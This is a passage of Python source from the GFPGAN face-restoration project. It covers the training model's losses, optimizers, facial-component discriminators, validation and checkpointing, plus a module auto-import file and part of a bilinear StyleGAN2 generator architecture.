None: self.load_network(self.net_g_ema, load_path, self.opt['path'].get('strict_load_g', True), 'params_ema') else: self.model_ema(0) # copy net_g weight self.net_g.train() self.net_d.train() self.net_g_ema.eval() # ----------- facial component networks ----------- # if ('network_d_left_eye' in self.opt and 'network_d_right_eye' in self.opt and 'network_d_mouth' in self.opt): self.use_facial_disc = True else: self.use_facial_disc = False if self.use_facial_disc: # left eye self.net_d_left_eye = build_network(self.opt['network_d_left_eye']) self.net_d_left_eye = self.model_to_device(self.net_d_left_eye) self.print_network(self.net_d_left_eye) load_path = self.opt['path'].get('pretrain_network_d_left_eye') if load_path is not None: self.load_network(self.net_d_left_eye, load_path, True, 'params') # right eye self.net_d_right_eye = build_network(self.opt['network_d_right_eye']) self.net_d_right_eye = self.model_to_device(self.net_d_right_eye) self.print_network(self.net_d_right_eye) load_path = self.opt['path'].get('pretrain_network_d_right_eye') if load_path is not None: self.load_network(self.net_d_right_eye, load_path, True, 'params') # mouth self.net_d_mouth = build_network(self.opt['network_d_mouth']) self.net_d_mouth = self.model_to_device(self.net_d_mouth) self.print_network(self.net_d_mouth) load_path = self.opt['path'].get('pretrain_network_d_mouth') if load_path is not None: self.load_network(self.net_d_mouth, load_path, True, 'params') self.net_d_left_eye.train() self.net_d_right_eye.train() self.net_d_mouth.train() # ----------- define facial component gan loss ----------- # self.cri_component = build_loss(train_opt['gan_component_opt']).to(self.device) # ----------- define losses ----------- # # pixel loss if train_opt.get('pixel_opt'): self.cri_pix = build_loss(train_opt['pixel_opt']).to(self.device) else: self.cri_pix = None # perceptual loss if train_opt.get('perceptual_opt'): self.cri_perceptual = build_loss(train_opt['perceptual_opt']).to(self.device) else: self.cri_perceptual = None # L1 loss is used in pyramid loss, component style loss and identity loss self.cri_l1 = build_loss(train_opt['L1_opt']).to(self.device) # gan loss (wgan) self.cri_gan = build_loss(train_opt['gan_opt']).to(self.device) # ----------- define identity loss ----------- # if 'network_identity' in self.opt: self.use_identity = True else: self.use_identity = False if self.use_identity: # define identity network self.network_identity = build_network(self.opt['network_identity']) self.network_identity = self.model_to_device(self.network_identity) self.print_network(self.network_identity) load_path = self.opt['path'].get('pretrain_network_identity') if load_path is not None: self.load_network(self.network_identity, load_path, True, None) self.network_identity.eval() for param in self.network_identity.parameters(): param.requires_grad = False # regularization weights self.r1_reg_weight = train_opt['r1_reg_weight'] # for discriminator self.net_d_iters = train_opt.get('net_d_iters', 1) self.net_d_init_iters = train_opt.get('net_d_init_iters', 0) self.net_d_reg_every = train_opt['net_d_reg_every'] # set up optimizers and schedulers self.setup_optimizers() self.setup_schedulers() def setup_optimizers(self): train_opt = self.opt['train'] # ----------- optimizer g ----------- # net_g_reg_ratio = 1 normal_params = [] for _, param in self.net_g.named_parameters(): normal_params.append(param) optim_params_g = [{ # add normal params first 'params': normal_params, 'lr': train_opt['optim_g']['lr'] }] optim_type = train_opt['optim_g'].pop('type') lr = train_opt['optim_g']['lr'] * net_g_reg_ratio betas = (0**net_g_reg_ratio, 0.99**net_g_reg_ratio) self.optimizer_g = self.get_optimizer(optim_type, optim_params_g, lr, betas=betas) self.optimizers.append(self.optimizer_g) # ----------- optimizer d ----------- # net_d_reg_ratio = self.net_d_reg_every / (self.net_d_reg_every + 1) normal_params = [] for _, param in self.net_d.named_parameters(): normal_params.append(param) optim_params_d = [{ # add normal params first 'params': normal_params, 'lr': train_opt['optim_d']['lr'] }] optim_type = train_opt['optim_d'].pop('type') lr = train_opt['optim_d']['lr'] * net_d_reg_ratio betas = (0**net_d_reg_ratio, 0.99**net_d_reg_ratio) self.optimizer_d = self.get_optimizer(optim_type, optim_params_d, lr, betas=betas) self.optimizers.append(self.optimizer_d) # ----------- optimizers for facial component networks ----------- # if self.use_facial_disc: # setup optimizers for facial component discriminators optim_type = train_opt['optim_component'].pop('type') lr = train_opt['optim_component']['lr'] # left eye self.optimizer_d_left_eye = self.get_optimizer( optim_type, self.net_d_left_eye.parameters(), lr, betas=(0.9, 0.99)) self.optimizers.append(self.optimizer_d_left_eye) # right eye self.optimizer_d_right_eye = self.get_optimizer( optim_type, self.net_d_right_eye.parameters(), lr, betas=(0.9, 0.99)) self.optimizers.append(self.optimizer_d_right_eye) # mouth self.optimizer_d_mouth = self.get_optimizer( optim_type, self.net_d_mouth.parameters(), lr, betas=(0.9, 0.99)) self.optimizers.append(self.optimizer_d_mouth) def feed_data(self, data): self.lq = data['lq'].to(self.device) if 'gt' in data: self.gt = data['gt'].to(self.device) if 'loc_left_eye' in data: # get facial component locations, shape (batch, 4) self.loc_left_eyes = data['loc_left_eye'] self.loc_right_eyes = data['loc_right_eye'] self.loc_mouths = data['loc_mouth'] # uncomment to check data # import torchvision # if self.opt['rank'] == 0: # import os # os.makedirs('tmp/gt', exist_ok=True) # os.makedirs('tmp/lq', exist_ok=True) # print(self.idx) # torchvision.utils.save_image( # self.gt, f'tmp/gt/gt_{self.idx}.png', nrow=4, padding=2, normalize=True, range=(-1, 1)) # torchvision.utils.save_image( # self.lq, f'tmp/lq/lq{self.idx}.png', nrow=4, padding=2, normalize=True, range=(-1, 1)) # self.idx = self.idx + 1 def construct_img_pyramid(self): """Construct image pyramid for intermediate restoration loss""" pyramid_gt = [self.gt] down_img = self.gt for _ in range(0, self.log_size - 3): down_img = F.interpolate(down_img, scale_factor=0.5, mode='bilinear', align_corners=False) pyramid_gt.insert(0, down_img) return pyramid_gt def get_roi_regions(self, eye_out_size=80, mouth_out_size=120): face_ratio = int(self.opt['network_g']['out_size'] / 512) eye_out_size *= face_ratio mouth_out_size *= face_ratio rois_eyes = [] rois_mouths = [] for b in range(self.loc_left_eyes.size(0)): # loop for batch size # left eye and right eye img_inds = self.loc_left_eyes.new_full((2, 1), b) bbox = torch.stack([self.loc_left_eyes[b, :], self.loc_right_eyes[b, :]], dim=0) # shape: (2, 4) rois = torch.cat([img_inds, bbox], dim=-1) # shape: (2, 5) rois_eyes.append(rois) # mouse img_inds = self.loc_left_eyes.new_full((1, 1), b) rois = torch.cat([img_inds, self.loc_mouths[b:b + 1, :]], dim=-1) # shape: (1, 5) rois_mouths.append(rois) rois_eyes = torch.cat(rois_eyes, 0).to(self.device) rois_mouths = torch.cat(rois_mouths, 0).to(self.device) # real images all_eyes = roi_align(self.gt, boxes=rois_eyes, output_size=eye_out_size) * face_ratio self.left_eyes_gt = all_eyes[0::2, :, :, :] self.right_eyes_gt = all_eyes[1::2, :, :, :] self.mouths_gt = roi_align(self.gt, boxes=rois_mouths, output_size=mouth_out_size) * face_ratio # output all_eyes = roi_align(self.output, boxes=rois_eyes, output_size=eye_out_size) * face_ratio self.left_eyes = all_eyes[0::2, :, :, :] self.right_eyes = all_eyes[1::2, :, :, :] self.mouths = roi_align(self.output, boxes=rois_mouths, output_size=mouth_out_size) * face_ratio def _gram_mat(self, x): """Calculate Gram matrix. Args: x (torch.Tensor): Tensor with shape of (n, c, h, w). Returns: torch.Tensor: Gram matrix. """ n, c, h, w = x.size() features = x.view(n, c, w * h) features_t = features.transpose(1, 2) gram = features.bmm(features_t) / (c * h * w) return gram def gray_resize_for_identity(self, out, size=128): out_gray = (0.2989 * out[:, 0, :, :] + 0.5870 * out[:, 1, :, :] + 0.1140 * out[:, 2, :, :]) out_gray = out_gray.unsqueeze(1) out_gray = F.interpolate(out_gray, (size, size), mode='bilinear', align_corners=False) return out_gray def optimize_parameters(self, current_iter): # optimize net_g for p in self.net_d.parameters(): p.requires_grad = False self.optimizer_g.zero_grad() # do not update facial component net_d if self.use_facial_disc: for p in self.net_d_left_eye.parameters(): p.requires_grad = False for p in self.net_d_right_eye.parameters(): p.requires_grad = False for p in self.net_d_mouth.parameters(): p.requires_grad = False # image pyramid loss weight pyramid_loss_weight = self.opt['train'].get('pyramid_loss_weight', 0) if pyramid_loss_weight > 0 and current_iter > self.opt['train'].get('remove_pyramid_loss', float('inf')): pyramid_loss_weight = 1e-12 # very small weight to avoid unused param error if pyramid_loss_weight > 0: self.output, out_rgbs = self.net_g(self.lq, return_rgb=True) pyramid_gt = self.construct_img_pyramid() else: self.output, out_rgbs = self.net_g(self.lq, return_rgb=False) # get roi-align regions if self.use_facial_disc: self.get_roi_regions(eye_out_size=80, mouth_out_size=120) l_g_total = 0 loss_dict = OrderedDict() if (current_iter % self.net_d_iters == 0 and current_iter > self.net_d_init_iters): # pixel loss if self.cri_pix: l_g_pix = self.cri_pix(self.output, self.gt) l_g_total += l_g_pix loss_dict['l_g_pix'] = l_g_pix # image pyramid loss if pyramid_loss_weight > 0: for i in range(0, self.log_size - 2): l_pyramid = self.cri_l1(out_rgbs[i], pyramid_gt[i]) * pyramid_loss_weight l_g_total += l_pyramid loss_dict[f'l_p_{2**(i+3)}'] = l_pyramid # perceptual loss if self.cri_perceptual: l_g_percep, l_g_style = self.cri_perceptual(self.output, self.gt) if l_g_percep is not None: l_g_total += l_g_percep loss_dict['l_g_percep'] = l_g_percep if l_g_style is not None: l_g_total += l_g_style loss_dict['l_g_style'] = l_g_style # gan loss fake_g_pred = self.net_d(self.output) l_g_gan = self.cri_gan(fake_g_pred, True, is_disc=False) l_g_total += l_g_gan loss_dict['l_g_gan'] = l_g_gan # facial component loss if self.use_facial_disc: # left eye fake_left_eye, fake_left_eye_feats = self.net_d_left_eye(self.left_eyes, return_feats=True) l_g_gan = self.cri_component(fake_left_eye, True, is_disc=False) l_g_total += l_g_gan loss_dict['l_g_gan_left_eye'] = l_g_gan # right eye fake_right_eye, fake_right_eye_feats = self.net_d_right_eye(self.right_eyes, return_feats=True) l_g_gan = self.cri_component(fake_right_eye, True, is_disc=False) l_g_total += l_g_gan loss_dict['l_g_gan_right_eye'] = l_g_gan # mouth fake_mouth, fake_mouth_feats = self.net_d_mouth(self.mouths, return_feats=True) l_g_gan = self.cri_component(fake_mouth, True, is_disc=False) l_g_total += l_g_gan loss_dict['l_g_gan_mouth'] = l_g_gan if self.opt['train'].get('comp_style_weight', 0) > 0: # get gt feat _, real_left_eye_feats = self.net_d_left_eye(self.left_eyes_gt, return_feats=True) _, real_right_eye_feats = self.net_d_right_eye(self.right_eyes_gt, return_feats=True) _, real_mouth_feats = self.net_d_mouth(self.mouths_gt, return_feats=True) def _comp_style(feat, feat_gt, criterion): return criterion(self._gram_mat(feat[0]), self._gram_mat( feat_gt[0].detach())) * 0.5 + criterion( self._gram_mat(feat[1]), self._gram_mat(feat_gt[1].detach())) # facial component style loss comp_style_loss = 0 comp_style_loss += _comp_style(fake_left_eye_feats, real_left_eye_feats, self.cri_l1) comp_style_loss += _comp_style(fake_right_eye_feats, real_right_eye_feats, self.cri_l1) comp_style_loss += _comp_style(fake_mouth_feats, real_mouth_feats, self.cri_l1) comp_style_loss = comp_style_loss * self.opt['train']['comp_style_weight'] l_g_total += comp_style_loss loss_dict['l_g_comp_style_loss'] = comp_style_loss # identity loss if self.use_identity: identity_weight = self.opt['train']['identity_weight'] # get gray images and resize out_gray = self.gray_resize_for_identity(self.output) gt_gray = self.gray_resize_for_identity(self.gt) identity_gt = self.network_identity(gt_gray).detach() identity_out = self.network_identity(out_gray) l_identity = self.cri_l1(identity_out, identity_gt) * identity_weight l_g_total += l_identity loss_dict['l_identity'] = l_identity l_g_total.backward() self.optimizer_g.step() # EMA self.model_ema(decay=0.5**(32 / (10 * 1000))) # ----------- optimize net_d ----------- # for p in self.net_d.parameters(): p.requires_grad = True self.optimizer_d.zero_grad() if self.use_facial_disc: for p in self.net_d_left_eye.parameters(): p.requires_grad = True for p in self.net_d_right_eye.parameters(): p.requires_grad = True for p in self.net_d_mouth.parameters(): p.requires_grad = True self.optimizer_d_left_eye.zero_grad() self.optimizer_d_right_eye.zero_grad() self.optimizer_d_mouth.zero_grad() fake_d_pred = self.net_d(self.output.detach()) real_d_pred = self.net_d(self.gt) l_d = self.cri_gan(real_d_pred, True, is_disc=True) + self.cri_gan(fake_d_pred, False, is_disc=True) loss_dict['l_d'] = l_d # In WGAN, real_score should be positive and fake_score should be negative loss_dict['real_score'] = real_d_pred.detach().mean() loss_dict['fake_score'] = fake_d_pred.detach().mean() l_d.backward() # regularization loss if current_iter % self.net_d_reg_every == 0: self.gt.requires_grad = True real_pred = self.net_d(self.gt) l_d_r1 = r1_penalty(real_pred, self.gt) l_d_r1 = (self.r1_reg_weight / 2 * l_d_r1 * self.net_d_reg_every + 0 * real_pred[0]) loss_dict['l_d_r1'] = l_d_r1.detach().mean() l_d_r1.backward() self.optimizer_d.step() # optimize facial component discriminators if self.use_facial_disc: # left eye fake_d_pred, _ = self.net_d_left_eye(self.left_eyes.detach()) real_d_pred, _ = self.net_d_left_eye(self.left_eyes_gt) l_d_left_eye = self.cri_component( real_d_pred, True, is_disc=True) + self.cri_gan( fake_d_pred, False, is_disc=True) loss_dict['l_d_left_eye'] = l_d_left_eye l_d_left_eye.backward() # right eye fake_d_pred, _ = self.net_d_right_eye(self.right_eyes.detach()) real_d_pred, _ = self.net_d_right_eye(self.right_eyes_gt) l_d_right_eye = self.cri_component( real_d_pred, True, is_disc=True) + self.cri_gan( fake_d_pred, False, is_disc=True) loss_dict['l_d_right_eye'] = l_d_right_eye l_d_right_eye.backward() # mouth fake_d_pred, _ = self.net_d_mouth(self.mouths.detach()) real_d_pred, _ = self.net_d_mouth(self.mouths_gt) l_d_mouth = self.cri_component( real_d_pred, True, is_disc=True) + self.cri_gan( fake_d_pred, False, is_disc=True) loss_dict['l_d_mouth'] = l_d_mouth l_d_mouth.backward() self.optimizer_d_left_eye.step() self.optimizer_d_right_eye.step() self.optimizer_d_mouth.step() self.log_dict = self.reduce_loss_dict(loss_dict) def test(self): with torch.no_grad(): if hasattr(self, 'net_g_ema'): self.net_g_ema.eval() self.output, _ = self.net_g_ema(self.lq) else: logger = get_root_logger() logger.warning('Do not have self.net_g_ema, use self.net_g.') self.net_g.eval() self.output, _ = self.net_g(self.lq) self.net_g.train() def dist_validation(self, dataloader, current_iter, tb_logger, save_img): if self.opt['rank'] == 0: self.nondist_validation(dataloader, current_iter, tb_logger, save_img) def nondist_validation(self, dataloader, current_iter, tb_logger, save_img): dataset_name = dataloader.dataset.opt['name'] with_metrics = self.opt['val'].get('metrics') is not None use_pbar = self.opt['val'].get('pbar', False) if with_metrics: if not hasattr(self, 'metric_results'): # only execute in the first run self.metric_results = {metric: 0 for metric in self.opt['val']['metrics'].keys()} # initialize the best metric results for each dataset_name (supporting multiple validation datasets) self._initialize_best_metric_results(dataset_name) # zero self.metric_results self.metric_results = {metric: 0 for metric in self.metric_results} metric_data = dict() if use_pbar: pbar = tqdm(total=len(dataloader), unit='image') for idx, val_data in enumerate(dataloader): img_name = osp.splitext(osp.basename(val_data['lq_path'][0]))[0] self.feed_data(val_data) self.test() sr_img = tensor2img(self.output.detach().cpu(), min_max=(-1, 1)) metric_data['img'] = sr_img if hasattr(self, 'gt'): gt_img = tensor2img(self.gt.detach().cpu(), min_max=(-1, 1)) metric_data['img2'] = gt_img del self.gt # tentative for out of GPU memory del self.lq del self.output torch.cuda.empty_cache() if save_img: if self.opt['is_train']: save_img_path = osp.join(self.opt['path']['visualization'], img_name, f'{img_name}_{current_iter}.png') else: if self.opt['val']['suffix']: save_img_path = osp.join(self.opt['path']['visualization'], dataset_name, f'{img_name}_{self.opt["val"]["suffix"]}.png') else: save_img_path = osp.join(self.opt['path']['visualization'], dataset_name, f'{img_name}_{self.opt["name"]}.png') imwrite(sr_img, save_img_path) if with_metrics: # calculate metrics for name, opt_ in self.opt['val']['metrics'].items(): self.metric_results[name] += calculate_metric(metric_data, opt_) if use_pbar: pbar.update(1) pbar.set_description(f'Test {img_name}') if use_pbar: pbar.close() if with_metrics: for metric in self.metric_results.keys(): self.metric_results[metric] /= (idx + 1) # update the best metric result self._update_best_metric_result(dataset_name, metric, self.metric_results[metric], current_iter) self._log_validation_metric_values(current_iter, dataset_name, tb_logger) def _log_validation_metric_values(self, current_iter, dataset_name, tb_logger): log_str = f'Validation {dataset_name}\n' for metric, value in self.metric_results.items(): log_str += f'\t # {metric}: {value:.4f}' if hasattr(self, 'best_metric_results'): log_str += (f'\tBest: {self.best_metric_results[dataset_name][metric]["val"]:.4f} @ ' f'{self.best_metric_results[dataset_name][metric]["iter"]} iter') log_str += '\n' logger = get_root_logger() logger.info(log_str) if tb_logger: for metric, value in self.metric_results.items(): tb_logger.add_scalar(f'metrics/{dataset_name}/{metric}', value, current_iter) def save(self, epoch, current_iter): # save net_g and net_d self.save_network([self.net_g, self.net_g_ema], 'net_g', current_iter, param_key=['params', 'params_ema']) self.save_network(self.net_d, 'net_d', current_iter) # save component discriminators if self.use_facial_disc: self.save_network(self.net_d_left_eye, 'net_d_left_eye', current_iter) self.save_network(self.net_d_right_eye, 'net_d_right_eye', current_iter) self.save_network(self.net_d_mouth, 'net_d_mouth', current_iter) # save training state self.save_training_state(epoch, current_iter) File: gfpgan/models/__init__.py import importlib from basicsr.utils import scandir from os import path as osp # automatically scan and import model modules for registry # scan all the files that end with '_model.py' under the model folder model_folder = osp.dirname(osp.abspath(__file__)) model_filenames = [osp.splitext(osp.basename(v))[0] for v in scandir(model_folder) if v.endswith('_model.py')] # import all the model modules _model_modules = [importlib.import_module(f'gfpgan.models.{file_name}') for file_name in model_filenames] File: gfpgan/archs/stylegan2_bilinear_arch.py import math import random import torch from basicsr.ops.fused_act import FusedLeakyReLU, fused_leaky_relu from basicsr.utils.registry import ARCH_REGISTRY from torch import nn from torch.nn import functional as F class NormStyleCode(nn.Module): def forward(self, x): """Normalize the style codes. Args: x (Tensor): Style codes with shape (b, c). Returns: Tensor: Normalized tensor. """ return x * torch.rsqrt(torch.mean(x**2, dim=1, keepdim=True) + 1e-8) class EqualLinear(nn.Module): """Equalized Linear as StyleGAN2. Args: in_channels (int): Size of each sample. out_channels (int): Size of each output sample. bias (bool): If set to ``False``, the layer will not learn an additive bias. Default: ``True``. bias_init_val (float): Bias initialized value. Default: 0. lr_mul (float): Learning rate multiplier. Default: 1. activation (None | str): The activation after ``linear`` operation. Supported: 'fused_lrelu', None. Default: None. """ def __init__(self, in_channels, out_channels, bias=True, bias_init_val=0, lr_mul=1, activation=None): super(EqualLinear, self).__init__() self.in_channels = in_channels self.out_channels = out_channels self.lr_mul = lr_mul self.activation = activation if self.activation not in ['fused_lrelu', None]: raise ValueError(f'Wrong activation value in EqualLinear: {activation}' "Supported ones are: ['fused_lrelu', None].") self.scale = (1 / math.sqrt(in_channels)) * lr_mul self.weight = nn.Parameter(torch.randn(out_channels, in_channels).div_(lr_mul)) if bias: self.bias = nn.Parameter(torch.zeros(out_channels).fill_(bias_init_val)) else: self.register_parameter('bias', None) def forward(self, x): if self.bias is None: bias = None else: bias = self.bias * self.lr_mul if self.activation == 'fused_lrelu': out = F.linear(x, self.weight * self.scale) out = fused_leaky_relu(out, bias) else: out = F.linear(x, self.weight * self.scale, bias=bias) return out def __repr__(self): return (f'{self.__class__.__name__}(in_channels={self.in_channels}, ' f'out_channels={self.out_channels}, bias={self.bias is not None})') class ModulatedConv2d(nn.Module): """Modulated Conv2d used in StyleGAN2. There is no bias in ModulatedConv2d. Args: in_channels (int): Channel number of the input. out_channels (int): Channel number of the output. kernel_size (int): Size of the convolving kernel. num_style_feat (int): Channel number of style features. demodulate (bool): Whether to demodulate in the conv layer. Default: True. sample_mode (str | None): Indicating 'upsample', 'downsample' or None. Default: None. eps (float): A value added to the denominator for numerical stability. Default: 1e-8. """ def __init__(self, in_channels, out_channels, kernel_size, num_style_feat, demodulate=True, sample_mode=None, eps=1e-8, interpolation_mode='bilinear'): super(ModulatedConv2d, self).__init__() self.in_channels = in_channels self.out_channels = out_channels self.kernel_size = kernel_size self.demodulate = demodulate self.sample_mode = sample_mode self.eps = eps self.interpolation_mode = interpolation_mode if self.interpolation_mode == 'nearest': self.align_corners = None else: self.align_corners = False self.scale = 1 / math.sqrt(in_channels * kernel_size**2) # modulation inside each modulated conv self.modulation = EqualLinear( num_style_feat, in_channels, bias=True, bias_init_val=1, lr_mul=1, activation=None) self.weight = nn.Parameter(torch.randn(1, out_channels, in_channels, kernel_size, kernel_size)) self.padding = kernel_size // 2 def forward(self, x, style): """Forward function. Args: x (Tensor): Tensor with shape (b, c, h, w). style (Tensor): Tensor with shape (b, num_style_feat). Returns: Tensor: Modulated tensor after convolution. """ b, c, h, w = x.shape # c = c_in # weight modulation style = self.modulation(style).view(b, 1, c, 1, 1) # self.weight: (1, c_out, c_in, k, k); style: (b, 1, c, 1, 1) weight = self.scale * self.weight * style # (b, c_out, c_in, k, k) if self.demodulate: demod = torch.rsqrt(weight.pow(2).sum([2, 3, 4]) + self.eps) weight = weight * demod.view(b, self.out_channels, 1, 1, 1) weight = weight.view(b * self.out_channels, c, self.kernel_size, self.kernel_size) if self.sample_mode == 'upsample': x = F.interpolate(x, scale_factor=2, mode=self.interpolation_mode, align_corners=self.align_corners) elif self.sample_mode == 'downsample': x = F.interpolate(x, scale_factor=0.5, mode=self.interpolation_mode, align_corners=self.align_corners) b, c, h, w = x.shape x = x.view(1, b * c, h, w) # weight: (b*c_out, c_in, k, k), groups=b out = F.conv2d(x, weight, padding=self.padding, groups=b) out = out.view(b, self.out_channels, *out.shape[2:4]) return out def __repr__(self): return (f'{self.__class__.__name__}(in_channels={self.in_channels}, ' f'out_channels={self.out_channels}, ' f'kernel_size={self.kernel_size}, ' f'demodulate={self.demodulate}, sample_mode={self.sample_mode})') class StyleConv(nn.Module): """Style conv. Args: in_channels (int): Channel number of the input. out_channels (int): Channel number of the output. kernel_size (int): Size of the convolving kernel. num_style_feat (int): Channel number of style features. demodulate (bool): Whether demodulate in the conv layer. Default: True. sample_mode (str | None): Indicating 'upsample', 'downsample' or None. Default: None. """ def __init__(self, in_channels, out_channels, kernel_size, num_style_feat, demodulate=True, sample_mode=None, interpolation_mode='bilinear'): super(StyleConv, self).__init__() self.modulated_conv = ModulatedConv2d( in_channels, out_channels, kernel_size, num_style_feat, demodulate=demodulate, sample_mode=sample_mode, interpolation_mode=interpolation_mode) self.weight = nn.Parameter(torch.zeros(1)) # for noise injection self.activate = FusedLeakyReLU(out_channels) def forward(self, x, style, noise=None): # modulate out = self.modulated_conv(x, style) # noise injection if noise is None: b, _, h, w = out.shape noise = out.new_empty(b, 1, h, w).normal_() out = out + self.weight * noise # activation (with bias) out = self.activate(out) return out class ToRGB(nn.Module): """To RGB from features. Args: in_channels (int): Channel number of input. num_style_feat (int): Channel number of style features. upsample (bool): Whether to upsample. Default: True. """ def __init__(self, in_channels, num_style_feat, upsample=True, interpolation_mode='bilinear'): super(ToRGB, self).__init__() self.upsample = upsample self.interpolation_mode = interpolation_mode if self.interpolation_mode == 'nearest': self.align_corners = None else: self.align_corners = False self.modulated_conv = ModulatedConv2d( in_channels, 3, kernel_size=1, num_style_feat=num_style_feat, demodulate=False, sample_mode=None, interpolation_mode=interpolation_mode) self.bias = nn.Parameter(torch.zeros(1, 3, 1, 1)) def forward(self, x, style, skip=None): """Forward function. Args: x (Tensor): Feature tensor with shape (b, c, h, w). style (Tensor): Tensor with shape (b, num_style_feat). skip (Tensor): Base/skip tensor. Default: None. Returns: Tensor: RGB images. """ out = self.modulated_conv(x, style) out = out + self.bias if skip is not None: if self.upsample: skip = F.interpolate( skip, scale_factor=2, mode=self.interpolation_mode, align_corners=self.align_corners) out = out + skip return out class ConstantInput(nn.Module): """Constant input. Args: num_channel (int): Channel number of constant input. size (int): Spatial size of constant input. """ def __init__(self, num_channel, size): super(ConstantInput, self).__init__() self.weight = nn.Parameter(torch.randn(1, num_channel, size, size)) def forward(self, batch): out = self.weight.repeat(batch, 1, 1, 1) return out @ARCH_REGISTRY.register() class StyleGAN2GeneratorBilinear(nn.Module): """StyleGAN2 Generator. Args: out_size (int): The spatial size of outputs. num_style_feat (int): Channel number of style features. Default: 512. num_mlp (int): Layer number of MLP style layers. Default: 8. channel_multiplier (int): Channel multiplier for large networks of StyleGAN2. Default: 2. lr_mlp (float): Learning rate multiplier for mlp layers. Default: 0.01. narrow (float): Narrow ratio for channels. Default: 1.0. """ def __init__(self, out_size, num_style_feat=512, num_mlp=8, channel_multiplier=2, lr_mlp=0.01, narrow=1, interpolation_mode='bilinear'): super(StyleGAN2GeneratorBilinear, self).__init__() # Style MLP layers self.num_style_feat = num_style_feat style_mlp_layers = [NormStyleCode()] for i in range(num_mlp): style_mlp_layers.append( EqualLinear( num_style_feat, num_style_feat, bias=True, bias_init_val=0, lr_mul=lr_mlp, activation='fused_lrelu')) self.style_mlp = nn.Sequential(*style_mlp_layers) channels = { '4': int(512 * narrow), '8': int(512 * narrow), '16': int(512 * narrow), '32': int(512 * narrow), '64': int(256 * channel_multiplier * narrow), '128': int(128 * channel_multiplier * narrow), '256': int(64 * channel_multiplier * narrow), '512': int(32 * channel_multiplier * narrow), '1024': int(16 * channel_multiplier * narrow) } self.channels = channels self.constant_input = ConstantInput(channels['4'], size=4) self.style_conv1 = StyleConv( channels['4'], channels['4'], kernel_size=3, num_style_feat=num_style_feat, demodulate=True, sample_mode=None, interpolation_mode=interpolation_mode) self.to_rgb1 = ToRGB(channels['4'], num_style_feat, upsample=False, interpolation_mode=interpolation_mode) self.log_size = int(math.log(out_size, 2)) self.num_layers = (self.log_size - 2) * 2 + 1 self.num_latent = self.log_size * 2 - 2 self.style_convs = nn.ModuleList() self.to_rgbs = nn.ModuleList() self.noises = nn.Module() in_channels = channels['4'] # noise for layer_idx in range(self.num_layers): resolution = 2**((layer_idx + 5) // 2) shape = [1, 1, resolution, resolution] self.noises.register_buffer(f'noise{layer_idx}', torch.randn(*shape)) # style convs and to_rgbs for i in range(3, self.log_size + 1): out_channels = channels[f'{2**i}'] self.style_convs.append( StyleConv( in_channels, out_channels, kernel_size=3, num_style_feat=num_style_feat, demodulate=True, sample_mode='upsample', interpolation_mode=interpolation_mode)) self.style_convs.append( StyleConv( out_channels, out_channels, kernel_size=3, num_style_feat=num_style_feat, demodulate=True, sample_mode=None, interpolation_mode=interpolation_mode)) self.to_rgbs.append( ToRGB(out_channels, num_style_feat, upsample=True, interpolation_mode=interpolation_mode)) in_channels = out_channels def make_noise(self): """Make noise for noise injection.""" device = self.constant_input.weight.device noises = [torch.randn(1, 1, 4, 4, device=device)] for i in range(3, self.log_size + 1): for _ in range(2): noises.append(torch.randn(1, 1, 2**i, 2**i, device=device)) return noises def get_latent(self, x): return self.style_mlp(x) def mean_latent(self, num_latent): latent_in = torch.randn(num_latent, self.num_style_feat, device=self.constant_input.weight.device) latent = self.style_mlp(latent_in).mean(0, keepdim=True) return latent def forward(self, styles, input_is_latent=False, noise=None, randomize_noise=True, truncation=1, truncation_latent=None, inject_index=None, return_latents=False): """Forward function for StyleGAN2Generator. Args: styles (list[Tensor]): Sample codes of styles. input_is_latent (bool): Whether input is latent style. Default: False. noise (Tensor | None): Input noise or None. Default: None. randomize_noise (bool): Randomize noise, used when 'noise' is False. Default: True. truncation (float): TODO. Default: 1. truncation_latent (Tensor | None): TODO. Default: None. inject_index (int | None): The injection index for mixing noise. Default: None. return_latents (bool): Whether to return style latents. Default: False. """ # style codes -> latents with Style MLP layer if not input_is_latent: styles = [self.style_mlp(s) for s in styles] # noises if noise is None: if randomize_noise: noise = [None] * self.num_layers # for each style conv layer else: # use the stored noise noise = [getattr(self.noises, f'noise{i}') for i in range(self.num_layers)] # style truncation if truncation < 1: style_truncation = [] for style in styles: style_truncation.append(truncation_latent + truncation * (style - truncation_latent)) styles = style_truncation # get style latent with injection if len(styles) == 1: inject_index = self.num_latent if styles[0].ndim < 3: # repeat latent code for all the layers latent = styles[0].unsqueeze(1).repeat(1, inject_index, 1) else: # used for encoder with different latent code for each layer latent = styles[0] elif len(styles) == 2: # mixing noises if inject_index is None: inject_index = random.randint(1, self.num_latent - 1) latent1 = styles[0].unsqueeze(1).repeat(1, inject_index, 1) latent2 = styles[1].unsqueeze(1).repeat(1, self.num_latent - inject_index, 1) latent = torch.cat([latent1, latent2], 1) # main generation out = self.constant_input(latent.shape[0]) out = self.style_conv1(out, latent[:, 0], noise=noise[0]) skip = self.to_rgb1(out, latent[:, 1]) i = 1 for conv1, conv2, noise1, noise2, to_rgb in zip(self.style_convs[::2], self.style_convs[1::2], noise[1::2], noise[2::2], self.to_rgbs): out = conv1(out, latent[:, i], noise=noise1) out = conv2(out, latent[:, i + 1], noise=noise2) skip = to_rgb(out, latent[:, i + 2], skip) i += 2 image = skip if return_latents: return image, latent else: return image, None class ScaledLeakyReLU(nn.Module): """Scaled LeakyReLU. Args: negative_slope (float): Negative slope. Default: 0.2. """ def __init__(self, negative_slope=0.2): super(ScaledLeakyReLU, self).__init__() self.negative_slope = negative_slope def forward(self, x): out = F.leaky_relu(x, negative_slope=self.negative_slope) return out * math.sqrt(2) class EqualConv2d(nn.Module): """Equalized Linear as StyleGAN2. Args: in_channels (int): Channel number of the input. out_channels (int): Channel number of the output. kernel_size (int): Size of the convolving kernel. stride (int): Stride of the convolution. Default: 1 padding (int): Zero-padding added to both sides of the input. Default: 0. bias (bool): If ``True``, adds a learnable bias to the output. Default: ``True``. bias_init_val (float): Bias initialized value. Default: 0. """ def __init__(self, in_channels, out_channels, kernel_size, stride=1, padding=0, bias=True, bias_init_val=0): super(EqualConv2d, self).__init__() self.in_channels = in_channels self.out_channels = out_channels self.kernel_size = kernel_size self.stride = stride self.padding = padding self.scale = 1 / math.sqrt(in_channels * kernel_size**2) self.weight = nn.Parameter(torch.randn(out_channels, in_channels, kernel_size, kernel_size)) if bias: self.bias = nn.Parameter(torch.zeros(out_channels).fill_(bias_init_val)) else: self.register_parameter('bias', None) def forward(self, x): out = F.conv2d( x, self.weight * self.scale, bias=self.bias, stride=self.stride, padding=self.padding, ) return out def __repr__(self): return 